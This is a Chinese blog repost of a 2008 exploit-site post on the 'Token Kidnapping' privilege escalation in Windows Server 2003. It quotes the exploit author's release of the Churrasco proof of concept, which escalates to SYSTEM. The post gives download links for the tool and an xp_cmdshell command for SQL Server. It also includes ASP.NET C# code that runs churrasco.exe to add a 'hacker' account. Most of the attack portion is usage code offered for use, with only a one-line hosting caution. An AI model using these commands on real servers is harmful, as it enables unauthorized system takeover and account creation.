Token Kidnapping Windows 2003 exploit

本文详细介绍了在Windows 2003系统中发现的一个关键漏洞,即Token Kidnapping漏洞,该漏洞允许攻击者在系统级别执行代码。文章提供了漏洞的PoC利用代码示例,展示了如何通过IIS6 worker进程或SQL Server执行代码,以及如何利用ASP.NET或经典ASP Web应用进行攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在聚合里看到人家测试,和刺聊了一下,刺居然告诉我MS没有修补这个 漏洞,马上测试 大家看图
1.jpg (263.08 KB)
2008-10-9 15:08

2.jpg (167.91 KB)
2008-10-9 15:08


好像是某次大会公布出来的

 

http://www.milw0rm.com/exploits/6705

 

(From http://nomoreroot.blogspot.com/2008/10/windows-2003-poc-exploit-for-token.html)
It has been a long time since Token Kidnapping presentation (http://www.argeniss.com/research/TokenKidnapping.pdf)
was published so I decided to release a PoC exploit for Win2k3 that alows to execute code under SYSTEM account.
Basically if you can run code under any service in Win2k3 then you can own Windows, this is because Windows
services accounts can impersonate.  Other process (not services) that can impersonate are IIS 6 worker processes
so if you can run code from an ASP .NET or classic ASP web application then you can own Windows too. If you provide
shared hosting services then I would recomend to not allow users to run this kind of code from ASP.
-SQL Server is a nice target for the exploit if you are a DBA and want to own Windows:
exec xp_cmdshell 'churrasco "net user /add hacker"'
-Exploiting IIS 6 with ASP .NET :
...
System.Diagnostics.Process myP = new System.Diagnostics.Process();
myP.StartInfo.RedirectStandardOutput = true;
myP.StartInfo.FileName=Server.MapPath("churrasco.exe");
myP.StartInfo.UseShellExecute = false;
myP.StartInfo.Arguments= " \"net user /add hacker\" ";
myP.Start();
string output = myP.StandardOutput.ReadToEnd();
Response.Write(output);
...
You can find the PoC exploit here http://www.argeniss.com/research/Churrasco.zip
backup link: http://milw0rm.com/sploits/2008-Churrasco.zip
Enjoy.
Cesar.
# milw0rm.com [2008-10-08]

转载于:https://www.cnblogs.com/jannock/archive/2008/10/10/1308086.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值